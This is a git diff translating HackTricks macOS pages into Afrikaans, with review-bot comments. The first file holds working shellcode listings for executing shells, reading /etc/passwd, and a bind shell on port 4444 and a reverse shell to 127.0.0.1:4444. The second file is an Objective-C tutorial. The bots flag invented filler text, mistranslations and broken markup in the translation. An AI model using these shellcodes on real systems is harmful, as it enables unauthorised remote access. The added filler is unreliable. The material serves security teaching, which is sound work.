-#### Shell +#### Skulp -Taken from [**here**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) and explained. +Geneem van [**hier**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s) en verduidelik. {% tabs %} -{% tab title="with adr" %} +{% tab title="met adr" %} ```armasm bits 64 global _main _main: - call r_cmd64 - db '/bin/zsh', 0 +call r_cmd64 +db '/bin/zsh', 0 r_cmd64: ; the call placed a pointer to db (argv[2]) - pop rdi ; arg1 from the stack placed by the call to l_cmd64 - xor rdx, rdx ; store null arg3 - push 59 ; put 59 on the stack (execve syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall +pop rdi ; arg1 from the stack placed by the call to l_cmd64 +xor rdx, rdx ; store null arg3 +push 59 ; put 59 on the stack (execve syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall ``` -{% endtab %} - -{% tab title="with stack" %} +{% tab title="met stapel" %} ```armasm bits 64 global _main _main: - xor rdx, rdx ; zero our RDX - push rdx ; push NULL string terminator - mov rbx, '/bin/zsh' ; move the path into RBX - push rbx ; push the path, to the stack - mov rdi, rsp ; store the stack pointer in RDI (arg1) - push 59 ; put 59 on the stack (execve syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall +xor rdx, rdx ; zero our RDX +push rdx ; push NULL string terminator +mov rbx, '/bin/zsh' ; move the path into RBX +push rbx ; push the path, to the stack +mov rdi, rsp ; store the stack pointer in RDI (arg1) +push 59 ; put 59 on the stack (execve syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall ``` {% endtab %} {% endtabs %} -#### Read with cat - -The goal is to execute `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, so 
the second argument (x1) is an array of params (which in memory these means a stack of the addresses). +#### Lees met kat +Die doel is om `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)` uit te voer, so die tweede argument (x1) is 'n reeks van parameters (wat in die geheue 'n stapel van die adresse beteken). ```armasm bits 64 section .text global _main _main: - ; Prepare the arguments for the execve syscall - sub rsp, 40 ; Allocate space on the stack similar to `sub sp, sp, #48` +; Prepare the arguments for the execve syscall +sub rsp, 40 ; Allocate space on the stack similar to `sub sp, sp, #48` - lea rdi, [rel cat_path] ; rdi will hold the address of "/bin/cat" - lea rsi, [rel passwd_path] ; rsi will hold the address of "/etc/passwd" - - ; Create inside the stack the array of args: ["/bin/cat", "/etc/passwd"] - push rsi ; Add "/etc/passwd" to the stack (arg0) - push rdi ; Add "/bin/cat" to the stack (arg1) - - ; Set in the 2nd argument of exec the addr of the array - mov rsi, rsp ; argv=rsp - store RSP's value in RSI +lea rdi, [rel cat_path] ; rdi will hold the address of "/bin/cat" +lea rsi, [rel passwd_path] ; rsi will hold the address of "/etc/passwd" - xor rdx, rdx ; Clear rdx to hold NULL (no environment variables) - - push 59 ; put 59 on the stack (execve syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall ; Make the syscall +; Create inside the stack the array of args: ["/bin/cat", "/etc/passwd"] +push rsi ; Add "/etc/passwd" to the stack (arg0) +push rdi ; Add "/bin/cat" to the stack (arg1) + +; Set in the 2nd argument of exec the addr of the array +mov rsi, rsp ; argv=rsp - store RSP's value in RSI + +xor rdx, rdx ; Clear rdx to hold NULL (no environment variables) + +push 59 ; put 59 on the stack (execve syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall ; Make the syscall section .data cat_path: db 
"/bin/cat", 0 passwd_path: db "/etc/passwd", 0 ``` - -#### Invoke command with sh - +#### Roep bevel met sh aan ```armasm bits 64 section .text global _main _main: - ; Prepare the arguments for the execve syscall - sub rsp, 32 ; Create space on the stack +; Prepare the arguments for the execve syscall +sub rsp, 32 ; Create space on the stack - ; Argument array - lea rdi, [rel touch_command] - push rdi ; push &"touch /tmp/lalala" - lea rdi, [rel sh_c_option] - push rdi ; push &"-c" - lea rdi, [rel sh_path] - push rdi ; push &"/bin/sh" +; Argument array +lea rdi, [rel touch_command] +push rdi ; push &"touch /tmp/lalala" +lea rdi, [rel sh_c_option] +push rdi ; push &"-c" +lea rdi, [rel sh_path] +push rdi ; push &"/bin/sh" - ; execve syscall - mov rsi, rsp ; rsi = pointer to argument array - xor rdx, rdx ; rdx = NULL (no env variables) - push 59 ; put 59 on the stack (execve syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall +; execve syscall +mov rsi, rsp ; rsi = pointer to argument array +xor rdx, rdx ; rdx = NULL (no env variables) +push 59 ; put 59 on the stack (execve syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall _exit: - xor rdi, rdi ; Exit status code 0 - push 1 ; put 1 on the stack (exit syscall) - pop rax ; pop it to RAX - bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) - syscall +xor rdi, rdi ; Exit status code 0 +push 1 ; put 1 on the stack (exit syscall) +pop rax ; pop it to RAX +bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) +syscall section .data sh_path: db "/bin/sh", 0 sh_c_option: db "-c", 0 touch_command: db "touch /tmp/lalala", 0 ``` +#### Bind skulp -#### Bind shell - -Bind shell from 
[https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) in **port 4444** - +Bind skulp vanaf [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) in **poort 4444**. ```armasm section .text global _main _main: - ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) - xor rdi, rdi - mul rdi - mov dil, 0x2 - xor rsi, rsi - mov sil, 0x1 - mov al, 0x2 - ror rax, 0x28 - mov r8, rax - mov al, 0x61 - syscall +; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) +xor rdi, rdi +mul rdi +mov dil, 0x2 +xor rsi, rsi +mov sil, 0x1 +mov al, 0x2 +ror rax, 0x28 +mov r8, rax +mov al, 0x61 +syscall - ; struct sockaddr_in { - ; __uint8_t sin_len; - ; sa_family_t sin_family; - ; in_port_t sin_port; - ; struct in_addr sin_addr; - ; char sin_zero[8]; - ; }; - mov rsi, 0xffffffffa3eefdf0 - neg rsi - push rsi - push rsp - pop rsi +; struct sockaddr_in { +; __uint8_t sin_len; +; sa_family_t sin_family; +; in_port_t sin_port; +; struct in_addr sin_addr; +; char sin_zero[8]; +; }; +mov rsi, 0xffffffffa3eefdf0 +neg rsi +push rsi +push rsp +pop rsi - ; bind(host_sockid, &sockaddr, 16) - mov rdi, rax - xor dl, 0x10 - mov rax, r8 - mov al, 0x68 - syscall +; bind(host_sockid, &sockaddr, 16) +mov rdi, rax +xor dl, 0x10 +mov rax, r8 +mov al, 0x68 +syscall - ; listen(host_sockid, 2) - xor rsi, rsi - mov sil, 0x2 - mov rax, r8 - mov al, 0x6a - syscall +; listen(host_sockid, 2) +xor rsi, rsi +mov sil, 0x2 +mov rax, r8 +mov al, 0x6a +syscall - ; accept(host_sockid, 0, 0) - xor rsi, rsi - xor rdx, rdx - mov rax, r8 - mov al, 0x1e - syscall +; accept(host_sockid, 0, 0) +xor rsi, rsi +xor rdx, rdx +mov rax, r8 +mov al, 0x1e +syscall - mov rdi, rax - mov sil, 0x3 +mov rdi, rax +mov sil, 0x3 dup2: - ; dup2(client_sockid, 2) - ; -> dup2(client_sockid, 
1) - ; -> dup2(client_sockid, 0) - mov rax, r8 - mov al, 0x5a - sub sil, 1 - syscall - test rsi, rsi - jne dup2 +; dup2(client_sockid, 2) +; -> dup2(client_sockid, 1) +; -> dup2(client_sockid, 0) +mov rax, r8 +mov al, 0x5a +sub sil, 1 +syscall +test rsi, rsi +jne dup2 - ; execve("//bin/sh", 0, 0) - push rsi - mov rdi, 0x68732f6e69622f2f - push rdi - push rsp - pop rdi - mov rax, r8 - mov al, 0x3b - syscall +; execve("//bin/sh", 0, 0) +push rsi +mov rdi, 0x68732f6e69622f2f +push rdi +push rsp +pop rdi +mov rax, r8 +mov al, 0x3b +syscall ``` +#### Omgekeerde Skulp -#### Reverse Shell - -Reverse shell from [https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html](https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html). Reverse shell to **127.0.0.1:4444** - +Omgekeerde skulp vanaf [https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html](https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html). 
Omgekeerde skulp na **127.0.0.1:4444** ```armasm section .text global _main _main: - ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) - xor rdi, rdi - mul rdi - mov dil, 0x2 - xor rsi, rsi - mov sil, 0x1 - mov al, 0x2 - ror rax, 0x28 - mov r8, rax - mov al, 0x61 - syscall +; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) +xor rdi, rdi +mul rdi +mov dil, 0x2 +xor rsi, rsi +mov sil, 0x1 +mov al, 0x2 +ror rax, 0x28 +mov r8, rax +mov al, 0x61 +syscall - ; struct sockaddr_in { - ; __uint8_t sin_len; - ; sa_family_t sin_family; - ; in_port_t sin_port; - ; struct in_addr sin_addr; - ; char sin_zero[8]; - ; }; - mov rsi, 0xfeffff80a3eefdf0 - neg rsi - push rsi - push rsp - pop rsi +; struct sockaddr_in { +; __uint8_t sin_len; +; sa_family_t sin_family; +; in_port_t sin_port; +; struct in_addr sin_addr; +; char sin_zero[8]; +; }; +mov rsi, 0xfeffff80a3eefdf0 +neg rsi +push rsi +push rsp +pop rsi - ; connect(sockid, &sockaddr, 16) - mov rdi, rax - xor dl, 0x10 - mov rax, r8 - mov al, 0x62 - syscall +; connect(sockid, &sockaddr, 16) +mov rdi, rax +xor dl, 0x10 +mov rax, r8 +mov al, 0x62 +syscall - xor rsi, rsi - mov sil, 0x3 +xor rsi, rsi +mov sil, 0x3 dup2: - ; dup2(sockid, 2) - ; -> dup2(sockid, 1) - ; -> dup2(sockid, 0) - mov rax, r8 - mov al, 0x5a - sub sil, 1 - syscall - test rsi, rsi - jne dup2 +; dup2(sockid, 2) +; -> dup2(sockid, 1) +; -> dup2(sockid, 0) +mov rax, r8 +mov al, 0x5a +sub sil, 1 +syscall +test rsi, rsi +jne dup2 - ; execve("//bin/sh", 0, 0) - push rsi - mov rdi, 0x68732f6e69622f2f - push rdi - push rsp - pop rdi - xor rdx, rdx - mov rax, r8 - mov al, 0x3b - syscall +; execve("//bin/sh", 0, 0) +push rsi +mov rdi, 0x68732f6e69622f2f +push rdi +push rsp +pop rdi +xor rdx, rdx +mov rax, r8 +mov al, 0x3b +syscall ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
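Review bot: in the first hunk of this file the nested sub-bullets under the instruction list lose their indentation, so each example is promoted from a child item to a sibling of the instruction it illustrates: `- * Example: \`mov rax, rbx\` — ...` becomes `+* Voorbeeld: \`mov rax, rbx\` — ...` at the top level, and the same happens for the `push`/`pop`, `add`, `cmp` and `je` examples. Keep the two leading spaces on the translated lines. The same hunk also removes the blank line that separates a paragraph from the code fence that follows it (`-There are different classes of syscalls ...` is replaced by `+Daar is verskillende klasse van syscalls ...` with the empty line dropped, and again before the syscalls.master listing), and it rewrites whitespace only inside a fenced block (`-#define SYSCALL_CLASS_MACH 1 /* Mach */` against `+#define SYSCALL_CLASS_MACH 1 /* Mach */`, and the `1`..`12` rows of the syscall table). A translation change should leave fenced code byte-identical; please drop those code-only diffs.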
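Review bot: the `@@ -157,312 +151,301 @@` hunk deletes the `{% endtab %}` that closes the first tab without putting it back: the original `{% endtab %}`, blank line and `{% tab title="with stack" %}` are replaced by the single line `+{% tab title="met stapel" %}`, so the `met adr` tab is never closed and the `{% tabs %}` block will not render. Restore `{% endtab %}` before the second `{% tab %}`. Two further points in the same hunk: `-#### Read with cat` becomes `+#### Lees met kat`, which translates the name of the `cat` command (the text below it is `execve("/bin/cat", ...)`, so keep `cat`); and every fenced listing in the hunk (loader.c, both execve shellcodes, the cat, sh, bind-shell and reverse-shell listings) has its leading indentation stripped, e.g. `-    printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));` against `+printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));`. That is a whitespace-only change to code and it recurs in the bash extract loop and in the Objective-C file of this patch; the translation pass should not touch the inside of code fences. Finally, the footer is inconsistent with the header of the same file (`hacktruuks` / `github-repos` at the top, `hacking-truuks` / `GitHub-opslagplekke` at the bottom); pick one rendering.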
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md b/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md index fbd940b39..0dbc94229 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md @@ -2,40 +2,37 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
## Objective-C {% hint style="danger" %} -Note that programs written in Objective-C **retain** their class declarations **when** **compiled** into [Mach-O binaries](macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md). Such class declarations **include** the name and type of: +Let daarop dat programme geskryf in Objective-C **hul klasverklarings behou** wanneer hulle gekompileer word in [Mach-O-binêre](macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md). Sulke klasverklarings **bevat** die naam en tipe van: {% endhint %} -* The class -* The class methods -* The class instance variables - -You can get this information using [**class-dump**](https://github.com/nygard/class-dump): +* Die klas +* Die klasmetodes +* Die klas-instansie-variables +Jy kan hierdie inligting kry deur [**class-dump**](https://github.com/nygard/class-dump) te gebruik: ```bash class-dump Kindle.app ``` +Let wel dat hierdie name geobfuskeer kan word om die omkeer van die binêre kode moeiliker te maak. -Note that this names could be obfuscated to make the reversing of the binary more difficult. - -## Classes, Methods & Objects - -### Interface, Properties & Methods +## Klasse, Metodes & Objekte +### Koppelvlak, Eienskappe & Metodes ```objectivec // Declare the interface of the class @interface MyVehicle : NSObject 
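Review bot: `+* Die klas-instansie-variables` in this hunk leaves the English word in an otherwise Afrikaans bullet; the later heading in this same file uses `Instansie Veranderlikes`, so `* Die klas-instansieveranderlikes` keeps it consistent. The hunk also drops the blank line between that list and the sentence `+Jy kan hierdie inligting kry deur ...`, so in Markdown that sentence becomes a lazy continuation of the last bullet instead of a new paragraph; keep the empty line (and the one before the `class-dump Kindle.app` fence) exactly as in the removed lines.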
@@ -50,29 +47,25 @@ Note that this names could be obfuscated to make the reversing of the binary mor @end ``` - -### **Class** - +### **Klas** ```objectivec @implementation MyVehicle : NSObject // No need to indicate the properties, only define methods - (void)startEngine { - NSLog(@"Engine started"); +NSLog(@"Engine started"); } - (void)addWheels:(int)value { - self.numberOfWheels += value; +self.numberOfWheels += value; } @end ``` +### **Objek & Roep Metode Aan** -### **Object & Call Method** - -To create an instance of a class the **`alloc`** method is called which **allocate memory** for each **property** and **zero** those allocations. Then **`init`** is called, which **initilize the properties** to the **required values**. - +Om 'n instansie van 'n klas te skep, word die **`alloc`**-metode geroep wat geheue toewys vir elke **eienskap** en dit **nulstel**. Dan word **`init`** geroep, wat die eienskappe **inisialiseer** na die **vereiste waardes**. ```objectivec // Something like this: MyVehicle *newVehicle = [[MyVehicle alloc] init]; @@ -84,19 +77,15 @@ MyVehicle *newVehicle = [MyVehicle new]; // [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2] [newVehicle addWheels:4]; ``` +### **Klasmetodes** -### **Class Methods** - -Class methods are defined with the **plus sign** (+) not the hyphen (-) that is used with instance methods. Like the **NSString** class method **`stringWithString`**: - +Klasmetodes word gedefinieer met die **plusteken** (+) en nie die strepie (-) wat gebruik word met instansiemetodes. Soos die **NSString** klasmetode **`stringWithString`**: ```objectivec + (id)stringWithString:(NSString *)aString; ``` - ### Setter & Getter -To **set** & **get** properties, you could do it with a **dot notation** or like if you were **calling a method**: - +Om eienskappe te **stel** en **kry**, kan jy dit doen met 'n **puntnotasie** of asof jy 'n **metode aanroep**: ```objectivec // Set newVehicle.numberOfWheels = 2; 
@@ -106,24 +95,20 @@ newVehicle.numberOfWheels = 2; NSLog(@"Number of wheels: %i", newVehicle.numberOfWheels); NSLog(@"Number of wheels: %i", [newVehicle numberOfWheels]); ``` +### **Instansie Veranderlikes** -### **Instance Variables** - -Alternatively to setter & getter methods you can use instance variables. These variables have the same name as the properties but starting with a "\_": - +Alternatiewelik tot setter- en getter-metodes kan jy instansie veranderlikes gebruik. Hierdie veranderlikes het dieselfde naam as die eienskappe, maar begin met 'n "\_": ```objectivec - (void)makeLongTruck { - _numberOfWheels = +10000; - NSLog(@"Number of wheels: %i", self.numberOfLeaves); +_numberOfWheels = +10000; +NSLog(@"Number of wheels: %i", self.numberOfLeaves); } ``` +### Protokolle -### Protocols - -Protocols are set of method declarations (without properties). A class that implements a protocol implement the declared methods. - -There are 2 types of methods: **mandatory** and **optional**. By **default** a method is **mandatory** (but you can also indicate it with a **`@required`** tag). To indicate that a method is optional use **`@optional`**. +Protokolle is 'n stel metodeverklarings (sonder eienskappe). 'n Klas wat 'n protokol implementeer, implementeer die verklaarde metodes. +Daar is 2 tipes metodes: **verpligtend** en **opsioneel**. Standaard is 'n metode **verpligtend** (maar jy kan dit ook aandui met 'n **`@required`** etiket). Om aan te dui dat 'n metode opsioneel is, gebruik **`@optional`**. ```objectivec @protocol myNewProtocol - (void) method1; //mandatory 
@@ -133,9 +118,55 @@ There are 2 types of methods: **mandatory** and **optional**. By **default** a m - (void) method3; //optional @end ``` +### Alles saam -### All together +Hier is 'n oorsig van die belangrikste aspekte van die Objective-C-programmeertaal: +#### Klasdefinisies + +Klasdefinisies word gebruik om die eienskappe en gedrag van 'n objek te beskryf. Dit sluit in die definisie van instansie- en klasmetodes, eienskappe en protokolle. + +#### Metodes + +Metodes is funksies wat spesifieke gedrag aan 'n objek toeken. Dit kan instansie- of klasmetodes wees. + +#### Eienskappe + +Eienskappe is veranderlikes wat die toestand van 'n objek voorstel. Dit kan openbaar of privaat wees. + +#### Protokolle + +Protokolle definieer 'n stel vereistes wat 'n klas moet nakom. Dit maak interaksie tussen klasse moontlik sonder om 'n gemeenskaplike basisimplementering te vereis. + +#### Inhouding + +Inhouding is die proses waarin 'n klas die eienskappe en metodes van 'n ander klas erwe. Dit maak hergebruik van kode moontlik en bevorder die herbruikbaarheid en onderhoudbaarheid van programme. + +#### Polimorfisme + +Polimorfisme verwys na die vermoë van 'n objek om verskillende vorme aan te neem. Dit maak dit moontlik om 'n enkele metode te gebruik om verskillende tipes objekte te hanteer. + +#### Geheuebestuur + +Objective-C maak gebruik van handmatige geheuebestuur. Dit beteken dat die ontwikkelaar verantwoordelik is vir die toekenning en vrylating van geheue vir objekte. + +#### Uitsonderingshantering + +Objective-C bied 'n stelsel vir die hantering van uitsonderings. Dit maak dit moontlik om fouttoestande te hanteer en te herstel. + +#### Delegasie + +Delegasie is 'n ontwerppatroon wat gebruik word om die verantwoordelikhede van 'n objek na 'n ander objek te skuif. Dit bevorder die herbruikbaarheid en modulariteit van kode. + +#### Kategorieë + +Kategorieë maak dit moontlik om bestaande klasse uit te brei sonder om die oorspronklike bronkode te wysig. 
Dit bied 'n manier om funksionaliteit by te voeg sonder om 'n nuwe klasse te skep. + +#### Blokke + +Blokke is stukke kode wat as argumente aan metodes kan oorgedra word. Dit maak dit moontlik om funksionaliteit dinamies te verander en te hergebruik. + +Hierdie konsepte is van kritieke belang vir die begrip van Objective-C en sal jou help om effektief te programmeer in hierdie taal. ```objectivec // gcc -framework Foundation test_obj.m -o test_obj #import @@ -161,32 +192,31 @@ There are 2 types of methods: **mandatory** and **optional**. By **default** a m @implementation MyVehicle : NSObject - (void)startEngine { - NSLog(@"Engine started"); +NSLog(@"Engine started"); } - (void)addWheels:(int)value { - self.numberOfWheels += value; +self.numberOfWheels += value; } - (void)makeLongTruck { - _numberOfWheels = +10000; - NSLog(@"Number of wheels: %i", self.numberOfWheels); +_numberOfWheels = +10000; +NSLog(@"Number of wheels: %i", self.numberOfWheels); } @end int main() { - MyVehicle* mySuperCar = [MyVehicle new]; - [mySuperCar startEngine]; - mySuperCar.numberOfWheels = 4; - NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); - [mySuperCar setNumberOfWheels:3]; - NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); - [mySuperCar makeLongTruck]; +MyVehicle* mySuperCar = [MyVehicle new]; +[mySuperCar startEngine]; +mySuperCar.numberOfWheels = 4; +NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); +[mySuperCar setNumberOfWheels:3]; +NSLog(@"Number of wheels: %i", mySuperCar.numberOfWheels); +[mySuperCar makeLongTruck]; } ``` - -### Basic Classes +### Basiese Klasse #### String 
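Review bot: the `### Alles saam` hunk inserts roughly forty lines (from `#### Klasdefinisies` through "Hierdie konsepte is van kritieke belang ...") that have no counterpart in the English source, which has only the heading followed by the full listing; a translation commit must not add content, and this filler is also partly wrong for the page ("Inhouding" is not the Afrikaans term for inheritance, "Oorerwing" is, and "handmatige geheuebestuur" ignores ARC, which the page never discusses). Reduce the hunk to `-### All together` / `+### Alles saam` plus the original blank line before the fence. The `main()` and method bodies in the listing again lose their indentation and should be left untouched.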
@@ -199,7 +229,7 @@ NSString *bookPublicationYear = [NSString stringWithCString:"1951" encoding:NSUT ``` {% endcode %} -Basic classes are **immutable**, so to append a string to an existing one a **new NSString needs to be created**. +Basiese klasse is **onveranderlik**, so om 'n string by 'n bestaande een te voeg, moet 'n **nuwe NSString geskep word**. {% code overflow="wrap" %} ```objectivec @@ -207,7 +237,7 @@ NSString *bookDescription = [NSString stringWithFormat:@"%@ by %@ was published ``` {% endcode %} -Or you could also use a **mutable** string class: +Of jy kan ook 'n **veranderlike** string klas gebruik: {% code overflow="wrap" %} ```objectivec @@ -220,7 +250,7 @@ NSMutableString *mutableString = [NSMutableString stringWithString:@"The book "] ``` {% endcode %} -#### Number +#### Nommer {% code overflow="wrap" %} ```objectivec @@ -241,9 +271,7 @@ NSNumber *piDouble = @3.1415926535; // equivalent to [NSNumber numberWithDouble: NSNumber *yesNumber = @YES; // equivalent to [NSNumber numberWithBool:YES] NSNumber *noNumber = @NO; // equivalent to [NSNumber numberWithBool:NO] ``` -{% endcode %} - -#### Array, Sets & Dictionary +#### Reeks, Stelle & Woordeboek {% code overflow="wrap" %} ```objectivec @@ -272,18 +300,18 @@ NSMutableSet *mutFruitsSet = [NSMutableSet setWithObjects:@"apple", @"banana", @ // Dictionary NSDictionary *fruitColorsDictionary = @{ - @"apple" : @"red", - @"banana" : @"yellow", - @"orange" : @"orange", - @"grape" : @"purple" +@"apple" : @"red", +@"banana" : @"yellow", +@"orange" : @"orange", +@"grape" : @"purple" }; // In dictionaryWithObjectsAndKeys you specify the value and then the key: NSDictionary *fruitColorsDictionary2 = [NSDictionary dictionaryWithObjectsAndKeys: - @"red", @"apple", - @"yellow", @"banana", - @"orange", @"orange", - @"purple", @"grape", +@"red", @"apple", +@"yellow", @"banana", +@"orange", @"orange", +@"purple", @"grape", nil]; // Mutable dictionary 
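Review bot: the `@@ -241,9 +271,7 @@` hunk deletes the `{% endcode %}` that closed the NSNumber block and never adds it back, so the preceding `{% code overflow="wrap" %}` is left open and GitBook will pull `#### Reeks, Stelle & Woordeboek` and everything after it into that wrapper; restore `{% endcode %}` and the blank line. `#### Nommer` is the wrong sense of "number" (an identifying number); `NSNumber` wraps numeric values, so `#### Getal` fits. The dictionary literal lines (`+@"apple" : @"red",` and the `dictionaryWithObjectsAndKeys:` arguments) are another case of indentation being stripped from unchanged code.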
@@ -293,50 +321,46 @@ NSMutableDictionary *mutFruitColorsDictionary = [NSMutableDictionary dictionaryW ``` {% endcode %} -### Blocks +### Blokke -Blocks are **functions that behaves as objects** so they can be passed to functions or **stored** in **arrays** or **dictionaries**. Also, they can **represent a value if they are given values** so it's similar to lambdas. - -{% code overflow="wrap" %} +Blokke is **funksies wat as objekte optree**, sodat hulle aan funksies kan word oorgedra of in **arrays** of **woordeboeke** kan word **gestoor**. Hulle kan ook **'n waarde verteenwoordig as daar waardes aan hulle gegee word**, so dit is soortgelyk aan lambdas. ```objectivec returnType (^blockName)(argumentType1, argumentType2, ...) = ^(argumentType1 param1, argumentType2 param2, ...){ - //Perform operations here +//Perform operations here }; // For example -int (^suma)(int, int) = ^(int a, int b){ - return a+b; +int (^suma)(int, int) = ^(int a, int b){ +return a+b; }; NSLog(@"3+4 = %d", suma(3,4)); ``` {% endcode %} -It's also possible to **define a block type to be used as a parameter** in functions: - +Dit is ook moontlik om **'n blok tipe te definieer wat as 'n parameter gebruik kan word** in funksies: ```objectivec // Define the block type typedef void (^callbackLogger)(void); // Create a bloack with the block type -callbackLogger myLogger = ^{ - NSLog(@"%@", @"This is my block"); +callbackLogger myLogger = ^{ +NSLog(@"%@", @"This is my block"); }; // Use it inside a function as a param void genericLogger(callbackLogger blockParam) { - NSLog(@"%@", @"This is my function"); - blockParam(); +NSLog(@"%@", @"This is my function"); +blockParam(); } genericLogger(myLogger); // Call it inline genericLogger(^{ - NSLog(@"%@", @"This is my second block"); +NSLog(@"%@", @"This is my second block"); }); ``` - -### Files +### Lêers {% code overflow="wrap" %} ```objectivec 
